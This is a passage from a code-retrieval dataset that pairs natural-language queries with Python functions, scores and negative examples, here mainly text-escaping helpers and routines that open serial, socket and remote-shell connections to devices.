LETTER M WITH DOT BELOW}', u'\\\\d M')\n self.register(u'\\N{LATIN SMALL LETTER M WITH DOT BELOW}', u'\\\\d m')\n self.register(u'\\N{LATIN CAPITAL LETTER N WITH DOT BELOW}', u'\\\\d N')\n self.register(u'\\N{LATIN SMALL LETTER N WITH DOT BELOW}', u'\\\\d n')\n self.register(u'\\N{LATIN CAPITAL LETTER R WITH DOT BELOW}', u'\\\\d R')\n self.register(u'\\N{LATIN SMALL LETTER R WITH DOT BELOW}', u'\\\\d r')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH DOT BELOW}', u'\\\\d S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH DOT BELOW}', u'\\\\d s')\n self.register(u'\\N{LATIN CAPITAL 
LETTER T WITH DOT BELOW}', u'\\\\d T')\n self.register(u'\\N{LATIN SMALL LETTER T WITH DOT BELOW}', u'\\\\d t')\n self.register(u'\\N{LATIN CAPITAL LETTER S WITH COMMA BELOW}',\n u'\\\\textcommabelow S')\n self.register(u'\\N{LATIN SMALL LETTER S WITH COMMA BELOW}',\n u'\\\\textcommabelow s')\n self.register(u'\\N{LATIN CAPITAL LETTER T WITH COMMA BELOW}',\n u'\\\\textcommabelow T')\n self.register(u'\\N{LATIN SMALL LETTER T WITH COMMA BELOW}',\n u'\\\\textcommabelow t')\n self.register(u'\\N{PARTIAL DIFFERENTIAL}', u'\\\\partial', mode='math')\n self.register(u'\\N{N-ARY PRODUCT}', u'\\\\prod', mode='math')\n self.register(u'\\N{N-ARY SUMMATION}', u'\\\\sum', mode='math')\n self.register(u'\\N{SQUARE ROOT}', u'\\\\surd', mode='math')\n self.register(u'\\N{INFINITY}', u'\\\\infty', mode='math')\n self.register(u'\\N{INTEGRAL}', u'\\\\int', mode='math')\n self.register(u'\\N{INTERSECTION}', u'\\\\cap', mode='math')\n self.register(u'\\N{UNION}', u'\\\\cup', mode='math')\n self.register(u'\\N{RIGHTWARDS ARROW}', u'\\\\rightarrow', mode='math')\n self.register(\n u'\\N{RIGHTWARDS DOUBLE ARROW}',\n u'\\\\Rightarrow',\n mode='math')\n self.register(u'\\N{LEFTWARDS ARROW}', u'\\\\leftarrow', mode='math')\n self.register(\n u'\\N{LEFTWARDS DOUBLE ARROW}',\n u'\\\\Leftarrow',\n mode='math')\n self.register(u'\\N{LOGICAL OR}', u'\\\\vee', mode='math')\n self.register(u'\\N{LOGICAL AND}', u'\\\\wedge', mode='math')\n self.register(u'\\N{ALMOST EQUAL TO}', u'\\\\approx', mode='math')\n self.register(u'\\N{NOT EQUAL TO}', u'\\\\neq', mode='math')\n self.register(u'\\N{LESS-THAN OR EQUAL TO}', u'\\\\leq', mode='math')\n self.register(u'\\N{GREATER-THAN OR EQUAL TO}', u'\\\\geq', mode='math')\n self.register(u'\\N{MODIFIER LETTER CIRCUMFLEX ACCENT}', u'\\\\^{}')\n self.register(u'\\N{CARON}', u'\\\\v{}')\n self.register(u'\\N{BREVE}', u'\\\\u{}')\n self.register(u'\\N{DOT ABOVE}', u'\\\\.{}')\n self.register(u'\\N{RING ABOVE}', u'\\\\r{}')\n self.register(u'\\N{OGONEK}', u'\\\\k{}')\n self.register(u'\\N{DOUBLE ACUTE ACCENT}', u'\\\\H{}')\n self.register(u'\\N{LATIN SMALL LIGATURE FI}', u'fi', decode=False)\n self.register(u'\\N{LATIN SMALL LIGATURE FL}', u'fl', decode=False)\n self.register(u'\\N{LATIN SMALL LIGATURE FF}', u'ff', decode=False)\n\n self.register(u'\\N{GREEK SMALL LETTER ALPHA}', u'\\\\alpha', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER BETA}', u'\\\\beta', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER GAMMA}', u'\\\\gamma', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER DELTA}', u'\\\\delta', mode='math')\n self.register(\n u'\\N{GREEK SMALL LETTER EPSILON}',\n u'\\\\epsilon',\n mode='math')\n self.register(u'\\N{GREEK SMALL LETTER ZETA}', u'\\\\zeta', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER ETA}', u'\\\\eta', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER THETA}', u'\\\\theta', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER THETA}', u'\\\\texttheta',\n package='textgreek', encode=False)\n self.register(u'\\N{GREEK SMALL LETTER IOTA}', u'\\\\iota', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER KAPPA}', u'\\\\kappa', mode='math')\n self.register(\n u'\\N{GREEK SMALL LETTER LAMDA}',\n u'\\\\lambda',\n mode='math') # LAMDA not LAMBDA\n self.register(u'\\N{GREEK SMALL LETTER MU}', u'\\\\mu', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER NU}', u'\\\\nu', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER XI}', u'\\\\xi', mode='math')\n self.register(\n u'\\N{GREEK SMALL LETTER OMICRON}',\n u'\\\\omicron',\n 
mode='math')\n self.register(u'\\N{GREEK SMALL LETTER PI}', u'\\\\pi', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER RHO}', u'\\\\rho', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER SIGMA}', u'\\\\sigma', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER TAU}', u'\\\\tau', mode='math')\n self.register(\n u'\\N{GREEK SMALL LETTER UPSILON}',\n u'\\\\upsilon',\n mode='math')\n self.register(u'\\N{GREEK SMALL LETTER PHI}', u'\\\\phi', mode='math')\n self.register(u'\\N{GREEK PHI SYMBOL}', u'\\\\varphi', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER CHI}', u'\\\\chi', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER PSI}', u'\\\\psi', mode='math')\n self.register(u'\\N{GREEK SMALL LETTER OMEGA}', u'\\\\omega', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER ALPHA}',\n u'\\\\Alpha',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER BETA}', u'\\\\Beta', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER GAMMA}',\n u'\\\\Gamma',\n mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER DELTA}',\n u'\\\\Delta',\n mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER EPSILON}',\n u'\\\\Epsilon',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER ZETA}', u'\\\\Zeta', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER ETA}', u'\\\\Eta', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER THETA}',\n u'\\\\Theta',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER IOTA}', u'\\\\Iota', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER KAPPA}',\n u'\\\\Kappa',\n mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER LAMDA}',\n u'\\\\Lambda',\n mode='math') # LAMDA not LAMBDA\n self.register(u'\\N{GREEK CAPITAL LETTER MU}', u'\\\\Mu', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER NU}', u'\\\\Nu', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER XI}', u'\\\\Xi', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER OMICRON}',\n u'\\\\Omicron',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER PI}', u'\\\\Pi', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER RHO}', u'\\\\Rho', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER SIGMA}',\n u'\\\\Sigma',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER TAU}', u'\\\\Tau', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER UPSILON}',\n u'\\\\Upsilon',\n mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER PHI}', u'\\\\Phi', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER CHI}', u'\\\\Chi', mode='math')\n self.register(u'\\N{GREEK CAPITAL LETTER PSI}', u'\\\\Psi', mode='math')\n self.register(\n u'\\N{GREEK CAPITAL LETTER OMEGA}',\n u'\\\\Omega',\n mode='math')\n self.register(u'\\N{COPYRIGHT SIGN}', u'\\\\copyright')\n self.register(u'\\N{COPYRIGHT SIGN}', u'\\\\textcopyright')\n self.register(u'\\N{LATIN CAPITAL LETTER A WITH ACUTE}', u\"\\\\'A\")\n self.register(u'\\N{LATIN CAPITAL LETTER I WITH ACUTE}', u\"\\\\'I\")\n self.register(u'\\N{HORIZONTAL ELLIPSIS}', u'\\\\ldots')\n self.register(u'\\N{TRADE MARK SIGN}', u'^{TM}', mode='math')\n self.register(\n u'\\N{TRADE MARK SIGN}',\n u'\\\\texttrademark',\n package='textcomp')\n self.register(\n u'\\N{REGISTERED SIGN}',\n u'\\\\textregistered',\n package='textcomp')\n # \\=O and \\=o will be translated into Ō and ō before we can\n # match the full latex string... 
so decoding disabled for now\n self.register(u'Ǭ', text_type(r'\\textogonekcentered{\\=O}'),\n decode=False)\n self.register(u'ǭ', text_type(r'\\textogonekcentered{\\=o}'),\n decode=False)\n self.register(u'ℕ', text_type(r'\\mathbb{N}'), mode='math')\n self.register(u'ℕ', text_type(r'\\mathbb N'), mode='math', decode=False)\n self.register(u'ℤ', text_type(r'\\mathbb{Z}'), mode='math')\n self.register(u'ℤ', text_type(r'\\mathbb Z'), mode='math', decode=False)\n self.register(u'ℚ', text_type(r'\\mathbb{Q}'), mode='math')\n self.register(u'ℚ', text_type(r'\\mathbb Q'), mode='math', decode=False)\n self.register(u'ℝ', text_type(r'\\mathbb{R}'), mode='math')\n self.register(u'ℝ', text_type(r'\\mathbb R'), mode='math', decode=False)\n self.register(u'ℂ', text_type(r'\\mathbb{C}'), mode='math')\n self.register(u'ℂ', text_type(r'\\mathbb C'), mode='math', decode=False)",
"def escape(txt):\n txt = sax_escape(txt, entities=ENTITIES)\n return mark_safe(txt)",
"def characters(self, content):\n if self.in_source: self.chars += content",
"def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text",
"def encodeLiteral(self, string):\r\n return string.replace(\"'\",\"''\")",
"def fix_characters(title):\n return re.sub('[^0-9a-zA-Z]+', ' ', title)",
"def htmlquote(text):\r\n text = text.replace(\"&\", \"&\") # Must be done first!\r\n text = text.replace(\"<\", \"<\")\r\n text = text.replace(\">\", \">\")\r\n text = text.replace(\"'\", \"'\")\r\n text = text.replace('\"', \""\")\r\n return text",
"def insert_text(self, text):\n self.str += text",
"def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)",
"def addpoemslashes(value):\n return value.replace(\"\\r\", \"\").replace(\"\\n\", ' / ')",
"def replaceNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else ' ' for i in text])",
"def escape(text):\n if (isinstance(text, basestring)):\n try: text = encode(text)\n except: text = copy(text)\n text = text.replace(\"&\", \"&\")\n text = text.replace(\"<\", \"<\")\n text = text.replace(\">\", \">\")\n return text",
"def forbidden_latex_chars():\n\n tex_char = ['\\\\', '{', '}', '&', '[', ']', '^', '~']\n chars = ', '.join(['\"{char}\"'.format(char=char) for char in tex_char])\n message = _(u\"Următoarele caractere sunt interzise și trebuie scoase : {chars}.\".format(chars=chars))\n return tex_char, message",
"def escape(t):\r\n return (t\r\n .replace(\"&\", \"&\").replace(\"<\", \"<\").replace(\">\", \">\")\r\n .replace(\"´\", \"'\").replace('\"', \""\").replace(\"'\",''')\r\n )",
"def pre_process(text: str) -> str:\n text = text.replace('--', '-')\n space_right = '!?:;,.-()*+-/<=>@^_'\n space_both = '-()*+-/<=>@^_'\n\n for punct in space_right:\n text = text.replace(punct, punct + ' ')\n for punct in space_both:\n text = text.replace(punct, ' ' + punct + ' ')\n\n # remove extra space\n text = re.sub(r' +', ' ', text)\n return text",
"def encode_tags(self, text):\n text = re.sub(self.patterns['html_open_tag'], r' __\\1_START ', text)\n text = re.sub(self.patterns['html_close_tag'], r' __\\1_END ', text)\n return text",
"def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])",
"def escape(t):\n return (t\n .replace(\"&\", \"&\").replace(\"<\", \"<\").replace(\">\", \">\")\n .replace(\"'\", \"'\").replace('\"', \""\")\n )",
"def escape(text):\n if isinstance(text, list):\n for i, t in enumerate(text):\n t = t.replace(r'\\&', r'&')\n t = t.replace(r'<', r'<')\n t = t.replace(r'>', r'>')\n text[i] = t\n else:\n text = text.replace(r'\\&', r'&')\n text = text.replace(r'<', r'<')\n text = text.replace(r'>', r'>')\n return text",
"def text_prep(text):\n text1 = text.lower()\n text2 = re.sub('[.,!?\"\\'-\\\\\\/:;1-9+]', ' ', text1)\n text3 = text2.replace('\\n', ' ')\n text4 = re.sub(' +', ' ', text3)\n text_obrab = text4.split()\n return text_obrab",
"def _apply_character_maskings(self):\n for permutation in self.permutations:\n for char_symbol in self.characters.keys():\n for i in permutation.find_all(\"character-link\", ref=char_symbol): \n i.string.replace_with(self.characters[char_symbol])\n\n self.plain_text = \" \".join([permuation.description.text for permuation in self.permutations])\n self.reapply_plain_text_editing()",
"def remove_special_chars(text):\n \n text = re.sub(' +', ' ', re.sub('[^A-Za-z ]+', ' ', text).strip())\n return text",
"def test_value_special_chars(self):\n raw = [\n 0x48,\n 0x65,\n 0x79,\n 0x21,\n 0x3F,\n 0x24,\n 0x20,\n 0xC4,\n 0xD6,\n 0xDC,\n 0xE4,\n 0xF6,\n 0xFC,\n 0xDF,\n ]\n string = \"Hey!?$ ÄÖÜäöüß\"\n self.assertEqual(DPTString.to_knx(string), raw)\n self.assertEqual(DPTString.from_knx(raw), string)",
"def insertChar(self, ch):\n word, cx = self.edCursor.getPos()\n string = word.string[:cx] + ch + word.string[cx:]\n word.setString(string)\n # Re-render from tline:\n self.rsubject.linify(word.tline)\n self.edCursor.setPos(word, cx+1)",
"def fix(text):\n\n text = text.replace(\"\\\\\", \"\\\\\\\\\")\n text = text.replace(\"{\", \"\\\\{\").replace(\"}\", \"\\\\}\")\n text = _nonAsciiPattern.sub(_replace, text)\n return text",
"def escape(s):\r\n return str(s).replace('<', '<').replace('>', '>')",
"def escape(text):\n if text is None:\n return\n else:\n return cgi.escape(text).encode('ascii', 'xmlcharrefreplace')",
"def escape_quote(text):\n return text_type(text).replace('&', '&').replace('<', '<').replace('>', '>').replace('\"', '"')",
"def remove_special(s):\n return ansi_escape_chars.sub('', s)",
"def escape(self) :\n #self.logdebug(\"ESCAPE\")\n self.handleTag(self.esctags)",
"def remove_special_characters(string_list):",
"def myescape(str):\n\tif str is not None:\n\t\treturn str.replace('&', '&').replace('<', '<')\n\telse:\n\t\treturn \"\"",
"def replace_characters(content_to_change):\n\tfor old_char, new_char in CHARS_TO_REPLACE.iteritems():\n\t\tcontent_to_change = content_to_change.replace(old_char, new_char)\n\n\treturn unicode(content_to_change, DESTINATION_ENCODING)",
"def secret_char(c):\n return \"\\\\raisebox{{0.07ex}}{{{}}}\".format(c)",
"def encode(user_word,shift):\n word = \"\" # creating a word variable\n for char in user_word: # iterating through every char in user_word\n if char in symbols:\n word += char\n continue\n elif char == \"'\":\n word += \"'\"\n continue\n \n\n elif char.isdigit(): # if a character is an integar number is found\n if user_word[user_word.index(char)-1] == \"-\":\n char = (int(char)*-1) + shift # converting character (number) from string to integar with incrementing it by a shift\n else: \n char = int(char) + shift # converting character (number) from string to integar with incrementing it by a shift\n \n char = str(char) # converting character from integar to string for displaying the word to user as string\n word += char # appending the char (string number) to word (string variable)\n continue # continue the loop, the get the next char for checking\n\n cipher_char = alphabet.index(char) # in this case, char is a letter, get its index in alphapet list saving it to cipher_char variable\n word += alphabet[cipher_char+shift] # appending shifted letter (got encoded by getting the letter that is after cipher_char by shift) to the word\n \n print(f\"\\nEncoded result> {word}\\n===========================================================\") # print the encoded word",
"def encode_parameters(self, text):\n return quote_plus(text, safe='=:&\"')",
"def urlencode(txt):\n return urllib.quote_plus(txt)",
"def _remove_special_chars(self, doc: str):\n processed_tweet = re.sub('[\\.,!#¡\\?¿%:;´\"@”“&()\\|]', '', doc)\n return processed_tweet",
"def defang_text(text):\n text = text.replace(\"'\", \"''\")\n text = text.replace('\"', '\"\"')\n return text",
"def process_text(text):\n text = re.sub(r'<@>\\s+|<s>\\s+|</s>\\s+|<p>\\s+|</p>\\s+|\\s+\\,|\\'s|\\'|\\;|\\(|\\)|\\-\\-\\s+|\\s+\\.', '', text)\n text = re.sub(r'\\.\\,', '. ,', text)\n text = re.sub(r'\\,', '', text)\n text = re.sub(r'\\$', '$ ', text)\n text = re.sub(r'\\%', ' %', text)\n text = re.sub(r'\\s\\\"\\s', ' ', text)\n text = re.sub(r'\\.\\s+', '. ', text)\n text = text.lower()\n return text",
"def _encode_html(data: str) -> str:\n return html.escape(data)",
"def _do_smart_punctuation(self, text):\r\n if \"'\" in text: # guard for perf\r\n text = self._do_smart_contractions(text)\r\n text = self._opening_single_quote_re.sub(\"‘\", text)\r\n text = self._closing_single_quote_re.sub(\"’\", text)\r\n\r\n if '\"' in text: # guard for perf\r\n text = self._opening_double_quote_re.sub(\"“\", text)\r\n text = self._closing_double_quote_re.sub(\"”\", text)\r\n\r\n text = text.replace(\"---\", \"—\")\r\n text = text.replace(\"--\", \"–\")\r\n text = text.replace(\"...\", \"…\")\r\n text = text.replace(\" . . . \", \"…\")\r\n text = text.replace(\". . .\", \"…\")\r\n return text",
"def _escape(html):\n return encoding.force_unicode(html).replace('&', '&').replace('<', '<').replace('>', '>').replace('\"', '"').replace(\"'\", ''')",
"def htmlspecialchars(val, flags = None):\n out = \"\"\n for i in range(0, len(val)):\n num = ord(unicode(val[i]))\n if htmlentitydefs.codepoint2name.has_key(num):\n out += \"&%s;\" % htmlentitydefs.codepoint2name[num]\n else:\n out += val[i]\n return out",
"def escape_shell_chars_tmsu(str):\n str = str.replace(\"/\", \"\\\\\")\n str = re.sub(\"(!|\\$|#|&|\\\"|\\'|\\(|\\)|\\||<|>|`|\\\\\\|;| )\", r\"\\\\\\1\", str)\n return str",
"def quote_bad_chars(s):\n bad_chars = [\"(\", \")\"]\n for char in bad_chars:\n s = s.replace(char, quotestring(char))\n return s",
"def escape(raw_string): \n return ''.join(\n [_caret_escapes_for_unprintables.get(c, c) for c in raw_string])",
"def escape_for_display(s) :\n if len(s) == 0 :\n return \"[EMPTY]\"\n return s.replace(\"\\n\",\"[NL]\").replace(\"\\t\",\"[TAB]\") #.replace(\" \",\"[SP]\") # Escape newlines so not to confuse debug output.",
"def escape(x):\n if '\\'' not in x:\n return '\\'' + x + '\\''\n s = '\"'\n for c in x:\n if c in '\\\\$\"`':\n s = s + '\\\\'\n s = s + c\n s = s + '\"'\n return s",
"def remove_special_chars(sentence):\r\n result = re.sub(r\"[^a-zA-Z0-9.]+\", ' ', re.sub('\\.\\.+', ' ', sentence))\r\n return result",
"def escape_single_quotes(custom_data):\n # https://stackoverflow.com/questions/10569438/how-to-print-unicode-character-in-python\n # https://regex101.com/r/nM4bXf/1\n if re.search(\"(?<!u)'(?!:|}|,)\", custom_data.get('title_name', '')):\n z = re.sub(r\"(?<!u)'(?!:|}|,)\", '\\\\\\'', custom_data.get('title_name', None))\n\n custom_data['title_name'] = z\n return custom_data\n return custom_data",
"def c_text(text):\n if text:\n if '_' in text:\n text = text.replace(\"_\", \" \")\n return 'C {}'.format(escape(text))",
"def _safe(text):\n return text.replace(\"'\", \"''\").replace(\"\\\\\", \"\\\\\\\\\")",
"def escape(cls, html):\n return (\"%s\" % (html)).replace('&', '&').replace('<', '<').replace('>', '>').replace('\"', '"').replace(\"'\", ''')"
] | [
"0.70876557",
"0.7074311",
"0.70390195",
"0.69395334",
"0.6510132",
"0.6444828",
"0.64407015",
"0.6432656",
"0.6415812",
"0.64102846",
"0.6397973",
"0.63384503",
"0.6326793",
"0.63186383",
"0.6290671",
"0.62346226",
"0.6180971",
"0.61617744",
"0.61617744",
"0.61369485",
"0.6117582",
"0.61156696",
"0.6109469",
"0.6107902",
"0.6100951",
"0.6053433",
"0.6046059",
"0.6042421",
"0.60301775",
"0.6022371",
"0.60173005",
"0.60118276",
"0.6007568",
"0.6005495",
"0.5981581",
"0.59803265",
"0.5967096",
"0.5963085",
"0.59616137",
"0.59594613",
"0.59405714",
"0.59380203",
"0.5903968",
"0.5902273",
"0.59005135",
"0.58933985",
"0.58927983",
"0.5888282",
"0.5857575",
"0.58506334",
"0.58491486",
"0.584501",
"0.5843568",
"0.5835549",
"0.58281374",
"0.58239496",
"0.58183825",
"0.5787254",
"0.5785572",
"0.57794255",
"0.57778704",
"0.57761055",
"0.5771807",
"0.5758023",
"0.57529694",
"0.5747586",
"0.57455903",
"0.57420325",
"0.5734525",
"0.57293165",
"0.5721921",
"0.5721399",
"0.57155603",
"0.57085836",
"0.57077897",
"0.5706246",
"0.5698083",
"0.56970745",
"0.5689006",
"0.5680908",
"0.5668837",
"0.56656224",
"0.5662608",
"0.56613123",
"0.56393814",
"0.5633934",
"0.56336886",
"0.56330085",
"0.56184995",
"0.56146693",
"0.5602431",
"0.560099",
"0.5593649",
"0.55931103",
"0.5585385",
"0.5584745",
"0.5582687",
"0.55825526",
"0.5581039",
"0.55804545",
"0.55803686"
] | 0.0 | -1 |
Init will connect to the com port of the shouter. | def __init__(self, comport, logging = False):
super(Bin_API, self).__init__(comport, logging) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def initialize(self):\n if self.real:\n self.agent.connect(self)\n else:\n self.connect() # Connect python client to VREP\n self.agent.connect(self)",
"def init_com(self):\r\n self.__ser = serial.Serial(\r\n self.__dev_no, self.__baudrate, timeout=self.__timeout)\r\n\r\n # Stop the Continious Stream, avoid error\r\n self.__ser.write(self.__api.esc_cmd())\r\n self.__ser.write(self.__api.devid_cmd())\r\n tmp = self.__ser.readline().decode()\r\n\r\n # Get Dev ID\r\n if \"ID= \" in tmp:\r\n self.__api.devid = tmp.split(\"ID= \")[1].replace(\"\\r\", \"\")\r\n rospy.loginfo(self.__api.devid)\r\n\r\n init_cmds = [self.__api.factory_settings_cmd, self.__api.format_cmd(self.__format),\r\n self.__api.sample_rate_cmd(100), self.__api.continuous_stream_cmd]\r\n\r\n for cmd in init_cmds:\r\n self.__ser.write(self.__api.write_enable_cmd)\r\n rospy.loginfo(self.__ser.readline().decode())\r\n time.sleep(self.init_sleep)\r\n rospy.loginfo(cmd)\r\n self.__ser.write(cmd)\r\n if cmd != self.__api.continuous_stream_cmd:\r\n rospy.loginfo(self.__ser.readline().decode())\r\n time.sleep(self.init_sleep)\r\n return True\r\n return False",
"def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.PORT = 2222\n # connect on construction,\n # use for duration of a game,\n # close connection on destruction later\n self.sock.connect((\"192.168.43.180\", self.PORT))",
"def __init__(self):\r\n\r\n self.port = 'COM3'\r\n self.baud = 9600\r\n\r\n try:\r\n self.ser = Serial(self.port, self.baud)\r\n except:\r\n exit(\"<ERROR: check serial connection>\")\r\n\r\n if not self.ser.is_open:\r\n exit(f\"<ERROR: can't open serial port: {self.port}>\")\r\n\r\n self.connect()",
"def connect(self):\n self.socket.connect((\"localhost\",self.PORT_NUM))",
"def __init__(self):\r\n try:\r\n print(f\"Connecting to Arduino on '{self._SERIAL_PORT}'...\", end='')\r\n self.ser = serial.Serial(self._SERIAL_PORT, self._BAUD, timeout=self._TIMEOUT)\r\n # Reset buffers to start with a clean slate\r\n self.ser.reset_input_buffer()\r\n self.ser.reset_output_buffer()\r\n print(\"Ok\")\r\n except serial.SerialException as e:\r\n print(\"Failed:\", e)",
"def __init__(self, host, server_port):\n # Set up the socket connection to the server\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.run(host, server_port)\n\n # TODO: Finish init process with necessary code\n #Vegard sier vi ikke skal skrive noe her",
"def connect(self) -> None:\n self.s.connect((self.ip, self.port))",
"async def init(self):\n logger.info(\"Init device: %s\", self._serial)\n self._callback(STATUS_INIT)\n\n self._init_binaries()\n self._init_apks()\n await self._init_forwards()\n\n await adb.shell(self._serial, \"/data/local/tmp/atx-agent server --stop\")\n await adb.shell(self._serial, \"/data/local/tmp/atx-agent server --nouia -d\")",
"def __init__(self):\n # Create a TCP/IP socket\n self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)",
"def connect(self):\n self.snmp_client = SNMPClient(host=self.host,\n read_community=self.read_community,\n write_community=self.write_community,\n port=self.port,\n version=self.version,\n log=self.log)",
"def _connect(self):\n\t\tself.log.info(\"Trying to connect to OBS Websockets...\")\n\n\t\ttry:\n\t\t\t\tself.client = obswebsocket.obsws(self.host, self.port, self.password)\n\t\t\t\tself.client.connect()\n\t\t\t\tself.log.info(\"...Connected to OBS Websockets at {}:{}\".format(self.host, self.port))\n\t\texcept Exception as e:\n\t\t\tself.log.error(\"Could not initialize connection at {}:{} to OBS Websockets! Exception: {}\".format(self.host, self.port, e))\n\t\t\traise",
"def init_connexion():\n connexion = socket(AF_INET, SOCK_STREAM)\n connexion.bind((hote, port))\n\n return connexion",
"def __init__(self, host=HOST, port=PORT):\r\n self._socket = None\r\n\r\n if host is not None:\r\n self.connect(host, port)",
"def __init__(self):\n self.try_to_connect()",
"def __init__(self, port):\n self.port = port\n self.connection = serial.Serial(timeout=1)\n self.connection.port = self.port",
"def _connect_to_hardware(self):\n if False: # !!!TEMP:need to validate config...\n if len(self.config['ports']) > 1:\n self.log.fatal(\"only one slave com port is supported\")\n if len(self.config['ports']) == 0:\n self.log.warning(\"no communication port setted!\")\n return\n port = self.config['ports'][0]\n self.communicator = RaspSerialCommunicator(\n platform=self, port=port,\n baud=self.config['baud'])\n self.communicator = RaspSerialCommunicator(\n platform=self, port='/dev/ttyAMA0',\n baud=115200)",
"def connect(self):\r\n try:\r\n self.host_win_ip = \"http://\" + self.host_ip + \":5985/wsman\"\r\n self.conn = Protocol(\r\n endpoint=self.host_win_ip,\r\n transport=\"ntlm\",\r\n username=self.usr,\r\n password=self.pwd,\r\n server_cert_validation=\"ignore\")\r\n logger.warn(\"Connecting Windows ...\")\r\n self.shell_id = self.conn.open_shell()\r\n logger.warn(self.shell_id)\r\n logger.warn('Connected to Windows.')\r\n except Exception as error:\r\n msg_exception_error = \"Exception raised: %s \" % error\r\n raise(msg_exception_error)",
"def __init__(self, com_str: str):\n self.com_str = com_str\n self.ser_arduino = Serial(self.com_str, 9600)\n logging.info(\"Arduino detected\")\n\n # Launch mediator\n self.arduino_mediator = ArduinoMediator(self.ser_arduino)\n self.arduino_mediator.start()\n logging.info(\"Arduino Mediator started\")\n\n handler = CsgoRequestHandler.create(\n self.arduino_mediator, self.data_store\n )\n self.server = HTTPServer((\"localhost\", 3000), handler)",
"def setUp(self):\n # Direct connection used to match the property values\n self.sockobj = socket(AF_INET, SOCK_STREAM)\n self.sockobj.settimeout(socket_timeout)\n # Connect to the selected server\n self.sockobj.connect(server) \n self.pyclient = PySimpleClient()\n self.cmd_num = 0\n for servo_type in app_nr.values():\n self.__dict__[servo_type] = self.pyclient.getComponent(\"MINORSERVO/\" + servo_type)",
"def init_relay(self, port):\n self.ser = SerialHelper()\n self.ser.port = port\n self.ser.start()",
"def __init__(self, host=\"127.0.0.1\", port=8888, ae_title=\"PYMEDPHYSCONNECT\"):\n\n self.host = host\n self.port = port\n self.ae_title = ae_title\n\n logging.debug(\n \"DicomConnect host: %s, port: %d, AE Title: %s\",\n self.host,\n self.port,\n self.ae_title,\n )",
"def init_serial():\n ser = serial.Serial()\n #ser.port = \"\\\\.\\COM4\" # Windows\n ser.port = \"/dev/ttyUSB0\" # Linux\n ser.baudrate = 57600\n try:\n ser.open()\n except Exception, e:\n logger.info(\"Possible open serial port: \" + str(e))\n print 'Check the serial USB port.'\n exit()\n return ser",
"def init_client():\n init_config()\n begin_sending_packets()",
"def connect(self):\n\n import serial\n\n if self.addr == None:\n self.addr = self.get_EFu_addr()\n\n self.ser = serial.Serial(self.addr, 115200, timeout=1)\n if self.ser.isOpen():\n print('Opened port: {}'.format(self.addr))\n else:\n raise RuntimeError('Failed to open the serial port: {}'.format(self.addr))",
"def __init__(self, connection_type='bluetooth'):\n if connection_type not in ['bluetooth', 'usb']:\n raise Exception('Connection type \\'' + connection_type + '\\' is not supported')\n\n self.buffer = \"\";\n\n self.serial_settings = module_config['computers'][host_pc]\n self.Serial = Serial(self.serial_settings[connection_type])\n self.Serial.reset_input_buffer() # disregard everything sent before the connection has benn established\n print(\"SerialConnection initialised using\", connection_type)",
"def _initialize(self):\n self.send_init_command()",
"def initServer( self ):\n self.createDict()\n self.queue = []\n if not self.regKey or not self.serNode: raise SerialDeviceError( 'Must define regKey and serNode attributes' )\n port = yield self.getPortFromReg( self.regKey )\n self.port = port\n try:\n serStr = yield self.findSerial( self.serNode )\n self.initSerial( serStr, port )\n except SerialConnectionError, e:\n self.ser = None\n if e.code == 0:\n print 'Could not find serial server for node: %s' % self.serNode\n print 'Please start correct serial server'\n elif e.code == 1:\n print 'Error opening serial connection'\n print 'Check set up and restart serial server'\n else: raise\n yield self.populateDict()\n self.free = True\n self.setComp( None, 'common', 0.0 )",
